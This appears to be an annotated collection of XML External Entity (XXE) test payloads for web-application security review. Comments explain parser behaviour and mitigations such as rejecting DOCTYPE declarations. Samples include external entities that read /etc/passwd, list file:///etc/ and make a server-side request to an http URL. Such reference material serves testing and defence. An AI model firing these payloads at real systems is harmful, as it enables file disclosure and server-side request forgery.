XML External Entity (XXE)
- https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity
<?xml version="1.0"?>
<!-- Baseline with no external access: the internal DTD subset declares two
     internal general entities whose replacement text is a literal string.
     A parser that processes the DTD expands the two references inside <text>
     to "Michal Szalkowski". -->
<!-- Review note: if an application accepts this document and the expanded text
     appears in its output, DTD processing is enabled for that input. Parsers
     that handle untrusted XML are normally configured to reject any DOCTYPE. -->
<!DOCTYPE change-log[
<!ENTITY myName "Michal">
<!ENTITY mySurname "Szalkowski">
]>
<change-log>
<text>&myName; &mySurname;</text>
</change-log>
<?xml version="1.0"?>
<!-- External general entity whose SYSTEM identifier is an http URL. A parser
     with external entity resolution enabled requests that URL while parsing and
     tries to use the response as the replacement text of &systemEntity;. Seen
     from the server, that is an outbound request made on behalf of whoever
     supplied the document (SSRF exposure). -->
<!-- Mitigation: reject DOCTYPE declarations or disable external general
     entities in the parser, e.g. the Xerces feature
     http://apache.org/xml/features/disallow-doctype-decl, or in libxml2 by not
     passing XML_PARSE_NOENT / XML_PARSE_DTDLOAD. Detection: unexpected egress
     from the host that parses XML. -->
<!-- The ';' after </text> is literal character data inside change-log, not
     part of the entity syntax. -->
<!DOCTYPE
change-log [
<!ENTITY systemEntity SYSTEM "http://example.com/feed/">
]
>
<change-log>
<text>&systemEntity;</text>;
</change-log>
<?xml version="1.0"?>
<!-- External general entity with a relative SYSTEM identifier. "robots.txt"
     has no scheme and no leading slash, so it is a relative reference that the
     parser resolves against the base URI of the entity holding the declaration
     (here, the document itself). -->
<!-- NOTE(review): what that base URI is depends on how the application loaded
     the document (file path, URL, or none for an in-memory string); confirm for
     the parser in use. With DTD processing or external entities disabled the
     reference is never resolved. -->
<!-- The ';' after </text> is literal character data inside change-log, not
     part of the entity syntax. -->
<!DOCTYPE change-log [<!ENTITY systemEntity SYSTEM "robots.txt">]>
<change-log>
<text>&systemEntity;</text>;
</change-log>
<?xml version="1.0"?>
<!-- External general entity whose SYSTEM identifier is an absolute filesystem
     path without a scheme. A parser that resolves external entities reads the
     file on the host doing the parsing and uses its content as the replacement
     text of &systemEntity;. If the application returns or logs the content of
     <text>, the file content is disclosed. -->
<!-- Mitigation: reject DOCTYPE declarations or disable external general
     entities before parsing untrusted XML. Entity expansion happens in the
     parser, so checks applied to the parsed tree afterwards come too late. -->
<!-- The ';' after </text> is literal character data inside change-log, not
     part of the entity syntax. -->
<!DOCTYPE change-log [<!ENTITY systemEntity SYSTEM "/etc/passwd">]>
<change-log>
<text>&systemEntity;</text>;
</change-log>
<?xml version="1.0"?>
<!-- External general entity whose SYSTEM identifier is a file: URI that names a
     directory rather than a file. The system literal is single-quoted here,
     which XML treats the same as double quotes. -->
<!-- NOTE(review): how a directory target is handled is parser- and
     runtime-specific (some return an error); confirm for the parser in use.
     The control is the same as for any external entity: reject DOCTYPE
     declarations or disable external entity resolution for untrusted input. -->
<!-- The ';' after </text> is literal character data inside change-log, not
     part of the entity syntax. -->
<!DOCTYPE change-log [<!ENTITY systemEntity SYSTEM 'file:///etc/'>]>
<change-log>
<text>&systemEntity;</text>;
</change-log>